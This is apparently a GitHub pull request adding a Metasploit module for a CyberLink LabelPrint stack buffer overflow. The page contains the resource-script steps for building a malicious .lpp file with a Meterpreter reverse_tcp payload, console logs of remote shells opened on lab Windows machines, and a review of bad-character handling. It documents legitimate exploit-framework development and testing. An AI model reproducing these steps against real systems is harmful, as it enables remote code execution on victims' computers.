Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode) #11040

Merged
merged 4 commits into from Dec 11, 2018

3 participants
@modpr0be
Contributor

modpr0be commented Nov 29, 2018

Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode) module based on EDB-42777.

This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below. The vulnerability is triggered when opening a .lpp project file containing an overly long string via the open file menu. This results in overwriting a structured exception handler record and taking over the application. This module has been tested on Windows 7 x64.

Verification

  • Run the downloader/installer (it will download the installer and install CyberLink Power2Go, LabelPrint, and WaveEditor)
  • Run msfconsole and the exploit module, then prepare the handler
  • Send the file to the target machine
  • Open CyberLink LabelPrint, go to Open -> choose msf.lpp -> shell/calc.


Generate msf.lpp example and handler output (tested on Windows 7 x64)

[*] Processing labelprint.rc for ERB directives.
resource (labelprint.rc)> use exploits/windows/fileformat/cyberlink_lpp_bof.rb
resource (labelprint.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (labelprint.rc)> set LHOST 192.168.240.129
LHOST => 192.168.240.129
resource (labelprint.rc)> exploit
[*] Creating 'msf.lpp' file ...
[+] msf.lpp stored at /root/.msf4/local/msf.lpp
resource (labelprint.rc)> use exploits/multi/handler
resource (labelprint.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (labelprint.rc)> set LHOST 192.168.240.129
LHOST => 192.168.240.129
resource (labelprint.rc)> exploit
[*] Started reverse TCP handler on 192.168.240.129:4444 
[*] Sending stage (179779 bytes) to 192.168.240.131
[*] Meterpreter session 1 opened (192.168.240.129:4444 -> 192.168.240.131:49598) at 2018-11-29 08:17:23 -0500

meterpreter >

NOTE: I used a dirty technique to reach the shellcode and it works. For now, it specifically works on Windows 7 x64. I managed to make it work on Windows 10 as well, but I need to change some padding characters to reach the shellcode.

If you guys know the shortest path, it would be an honor to learn from it.

Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)

@jrobles-r7 jrobles-r7 self-assigned this Nov 30, 2018

'Payload' =>
{
'Space' => 15000,
'BadChars' => "\x00", #badchars starts from 80 until the rest of it.


@bcoles

bcoles Dec 1, 2018

Contributor

starts from 80 until the rest of it

Does this mean \x80 to \xff , or \x50 to \xff , or something else?


@modpr0be

modpr0be Dec 2, 2018

Contributor

it's \x80 to \xff


@bcoles

bcoles Dec 2, 2018

Contributor

Ok, you can do something like this:

Suggested change:
'BadChars' => "\x00", #badchars starts from 80 until the rest of it.
'BadChars' => "\x00" + (0x80..0xff).to_a.pack('C*')
2.3.0 :001 > (0x80..0xff).to_a.pack('C*') + "\x00"
 => "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0\xC1\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xCB\xCC\xCD\xCE\xCF\xD0\xD1\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xDB\xDC\xDD\xDE\xDF\xE0\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xEB\xEC\xED\xEE\xEF\xF0\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFB\xFC\xFD\xFE\xFF\x00" 


@modpr0be

modpr0be Dec 2, 2018

Contributor

Thanks for the suggestion! I'm looking for a replacement like that :+1


@modpr0be

modpr0be Dec 4, 2018

Contributor

Apparently, if I put all the badchars using your suggested method, it will break how the encoder encodes the payload. It will always return [-] Exploit failed: No encoders encoded the buffer successfully. So for testing, I'll stick to 'BadChars' => "\x00",


@bcoles

bcoles Dec 5, 2018

Contributor

If that's the case, then not all the characters from \x80 to \xff are bad characters. You'll need to identify which characters are bad.


@modpr0be

modpr0be Dec 5, 2018

Contributor

I already trial-and-errored all characters and found that all characters from \x80 to \xff are identified as bad characters. The application won't load the crafted .lpp file if the file contains those bad characters.
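An added example in Ruby, not code from the PR or from the Metasploit module: it builds the BadChars string exactly as suggested above, reports which bad bytes a given buffer contains (the check an encoder must pass), and shows what a Windows-1252 to UTF-16LE conversion does to a byte above 0x7f. That conversion is an assumption about why every such byte is reported as bad in a "Unicode" overflow; the thread only states that the application refuses files containing them.

```ruby
require 'set'

# Same construction as the suggested change: NUL plus every byte 0x80..0xff
# (129 bytes in total). Kept binary (ASCII-8BIT) so no byte is reinterpreted.
BADCHARS = "\x00".b + (0x80..0xff).to_a.pack('C*')

# Returns the sorted, de-duplicated list of bad byte values present in +buf+.
# An encoded payload is only usable if this returns an empty array.
def bad_bytes_in(buf, badchars = BADCHARS)
  bad = badchars.bytes.to_set
  buf.bytes.select { |b| bad.include?(b) }.uniq.sort
end

# Assumption (not stated on the page): the application widens the 8-bit input
# as Windows-1252 text to UTF-16LE. Bytes below 0x80 become "XX 00" code
# units; bytes at 0x80 and above map elsewhere (0x80 -> U+20AC), so they can
# never be laid out in memory as the byte the payload intended. Undefined
# Windows-1252 bytes (e.g. 0x81) are replaced rather than raising.
# Returns each UTF-16 code unit as a big-endian hex string for readability.
def utf16le_units(str)
  wide = str.b.force_encoding('Windows-1252').encode('UTF-16LE', undef: :replace)
  wide.bytes.each_slice(2).map { |lo, hi| format('%02x%02x', hi, lo) }
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample buffer: two clean bytes, a NUL and two high bytes.
  sample = "\x41\x42\x00\x80\xff".b
  puts "bad bytes in sample: #{bad_bytes_in(sample).map { |b| format('0x%02x', b) }.join(' ')}"
  puts "\\x80A as UTF-16LE units: #{utf16le_units("\x80A".b).join(' ')}"
end
```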

@modpr0be


Contributor

modpr0be commented Dec 3, 2018

I'm still doing some work on Windows 8.1 and Windows 10, to see if I can manage to make it simpler.

@modpr0be


Contributor

modpr0be commented Dec 4, 2018

I will merge all suggestions on the next commit. Still trying on Windows 8.1 and Windows 10.

modpr0be and others added some commits Dec 5, 2018

Update cyberlink_lpp_bof.rb
Update includes all suggestions and new targets (Win8.1 x64 and Win10 x64)
@jrobles-r7


Contributor

jrobles-r7 commented Dec 11, 2018

Tested on Win10 x64 running CyberLink LabelPrint v2.5

msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > 
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

Tested on Win8.1 x64 running CyberLink LabelPrint v2.5

msf5 exploit(multi/handler) > 
[*] Sending stage (179779 bytes) to 172.22.222.135
[*] Meterpreter session 14 opened (172.22.222.132:4444 -> 172.22.222.135:49500) at 2018-12-11 07:46:56 -0600

msf5 exploit(multi/handler) > sessions -i 14
[*] Starting interaction with 14...

meterpreter > sysinfo
Computer        : IE11WIN8_1
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >

Tested on Win7 x64 running CyberLink LabelPrint v2.5

msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > 
[*] Sending stage (179779 bytes) to 172.22.222.134
[*] Meterpreter session 2 opened (172.22.222.132:4444 -> 172.22.222.134:49404) at 2018-12-11 07:23:25 -0600

msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > 
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : IEWIN7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

@jrobles-r7 jrobles-r7 merged commit 106d6ce into rapid7:master Dec 11, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request Dec 11, 2018

msjenkins-r7 added a commit that referenced this pull request Dec 11, 2018

@jrobles-r7 jrobles-r7 added docs and removed needs-docs labels Dec 11, 2018

@jrobles-r7


Contributor

jrobles-r7 commented Dec 11, 2018

Release Notes

The windows/fileformat/cyberlink_lpp_bof module generates an lpp project file that has a long string within the name element of the TRACK tag. The generated file exploits a buffer overflow vulnerability in CyberLink LabelPrint <= v2.5 when the application attempts to open the lpp project file.
